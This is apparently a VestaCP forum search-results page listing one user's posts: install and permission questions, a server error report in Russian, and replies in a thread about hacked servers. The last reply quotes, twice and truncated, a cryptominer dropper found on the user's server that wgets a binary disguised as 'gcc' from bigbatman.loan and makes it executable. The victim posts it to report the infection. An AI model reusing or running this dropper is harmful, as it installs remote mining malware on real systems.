Vesta 2.0 is coming soon! See our progress update: https://vestacp.com/docs/vesta-2-update
Search found 5 matches
- Thu Nov 03, 2022 7:53 am
- Forum: RHEL/CentOS
- Topic: Rocky Linux 9
- Replies: 0
- Views: 5730
Rocky Linux 9
Is it possible to install VestaCP on Rocky Linux 9?
- Tue Sep 13, 2022 12:09 pm
- Forum: Web Server
- Topic: shell_exec("journalctl"); user permissions
- Replies: 0
- Views: 5179
shell_exec("journalctl"); user permissions
I'm trying to get log messages of journalctl from PHP, but getting an error - "Hint: You are currently not seeing messages from other users and the system. Users in the 'systemd-journal' group can see all messages."
shell_exec('whoami') //shows "admin"
Tried to put into /etc/sudoers.d/admin ...
shell_exec('whoami') //shows "admin"
Tried to put into /etc/sudoers.d/admin ...
- Wed Jun 27, 2018 6:34 am
- Forum: Веб сервер
- Topic: 500 internal server error
- Replies: 0
- Views: 1548
500 internal server error
ночью слетел сервер. при заходе на сайты и phpmyadmin выдает 500 internal server error. попробовал просто перезагрузиться все заработало. но хотелось бы предотвратить данный сбой в будущем.
error.log у сайтов
[error] 897#0: *5753921 connect() failed (111: Connection refused) while connecting to ...
error.log у сайтов
[error] 897#0: *5753921 connect() failed (111: Connection refused) while connecting to ...
- Tue Jun 26, 2018 9:23 am
- Forum: General Discussion
- Topic: have been HACKED ! by xaxaxa.eu
- Replies: 40
- Views: 52546
Re: have been HACKED ! by xaxaxa.eu
Because I still have not get any informations from other users: Was your system infected with installed patch or without? Actual patch is 0.9.8-22 and fixes the security issue.
hacking happened on version 21, after update to 22 and remove of the virus the issue has stopped.
but now i have ...
- Tue Jun 26, 2018 8:07 am
- Forum: General Discussion
- Topic: have been HACKED ! by xaxaxa.eu
- Replies: 40
- Views: 52546
Re: have been HACKED ! by xaxaxa.eu
also was hacked tonight by mining virus
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json ...
if pgrep -x "gcc" > /dev/null
then
echo "Running"
else
cd;
pkill -f xmrig;
rm -rf /tmp/gcc;
rm -rf /tmp/config_1.json;
wget -O /tmp/gcc http://bigbatman.loan/gcc;
chmod 777 /tmp/gcc;
wget -O /tmp/config_1.json http://bigbatman.loan/config_1.json ...